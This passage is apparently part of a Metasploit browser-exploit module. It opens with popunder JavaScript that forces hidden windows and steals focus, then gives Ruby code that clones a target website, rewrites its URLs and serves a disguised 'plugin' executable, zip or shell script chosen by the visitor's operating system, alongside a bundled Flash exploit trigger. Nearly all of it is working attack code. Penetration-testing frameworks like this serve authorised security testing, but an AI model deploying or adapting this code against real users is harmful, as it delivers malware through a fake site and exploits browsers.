var popunder = (function(browser){
var uniq = 0;
browser = browser || {};
var popunder = function(url, opts) {
// set some defaults for opts
opts = opts || {};
opts.name = opts.name || '_pu'+uniq++;
opts.height = opts.height || 200;
opts.width = opts.width || 200;
opts.x = window.screenLeft || window.screenX || 0;
opts.y = window.screenTop || window.screenY || 0;
var query_str = 'toolbar=no,scrollbars=yes,location=yes,statusbar=yes,'+
'menubar=no,width='+opts.w+',height='+opts.h+
',screenX='+opts.x+',screenY='+opts.y;
var pu = window.open(url, opts.name, query_str);
var c = pu.setInterval('window.blur(); opener.focus();', 1);
var c2 = window.setInterval('window.focus();', 1);
setTimeout(function(){ window.clearTimeout(c2); if(pu&&pu.clearTimeout) pu.clearTimeout(c); }, 3000);
if (browser.firefox) { // dbl check this!
// firefox needs a new popup to trick it.
pu.open('about:blank', '_b').close();
window.open('about:blank', '_b2').close()
}
else if (browser.chrome) {
var a = document.createElement("a");
a.href = "data:text/html,<scr"+"ipt>window.close();</scr"+"ipt>";
document.body.appendChild(a);
var cc = document.createEvent("MouseEvents");
cc.initMouseEvent("click", false, true, window, 0, 0, 0, 0, 0,
true, false, false, true, 0, null);
a.dispatchEvent(cc);
document.body.removeChild(a);
if(window.t2){window.t2.close();}
window.setTimeout(function(){if(window.t2){window.t2.close();}});
}
pu.blur(); window.focus(); window.self.window.focus(); // for good measure :)
return pu;
};
return popunder;
})(browser);
window.name = '__flash';
window.setInterval(function(){
window.name = '__flash';
},20);
EOS
end
# grabs the HTML content of the CLONEURL datastore option
def fetch_cloned_content(clone_url=datastore['CLONEURL'])
io = open(clone_url)
html = rewrite_urls(io)
io.close
html
end
# updates any elements in the document to use absolute paths
def rewrite_urls(io)
print_status 'Rewriting relative URLs in cloned HTML...'
doc = Nokogiri::HTML(io)
%w(href src data).each do |attr_name|
doc.css("[#{attr_name}]").each do |el|
# rewrite URL if not absolute
src = el.attributes[attr_name]
el.set_attribute(attr_name, URI.join(datastore['CLONEURL'], src))
end
end
doc.to_html
end
def swf_navigate_ie10
swf_path = File.join(Msf::Config.install_root, "data", "exploits", "navigate_ie10.swf")
@flash_trigger ||= File.read(swf_path)
end
def swf_url(agent)
exe_url(agent).sub(/\.\w+$/, '.swf')
end
def exe_url(agent, base=base_url)
name = datastore["PLUGINNAME"].downcase.gsub(/\s+/, '_')
base ||= get_resource
if agent =~ /macintosh/i
"#{base}/#{name}_plugin.zip"
elsif agent =~ /linux/i
"#{base}/#{name}_plugin.sh"
else
"#{base}/#{name}_plugin.exe"
end
end
# @return [String] URL for sending requests back to the module
def base_url
proto = (datastore["SSL"] ? "https" : "http")
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{get_resource}"
end
def plugin_url
datastore['PLUGINURL']
end
end
Reference in New Issue View Git Blame Copy Permalink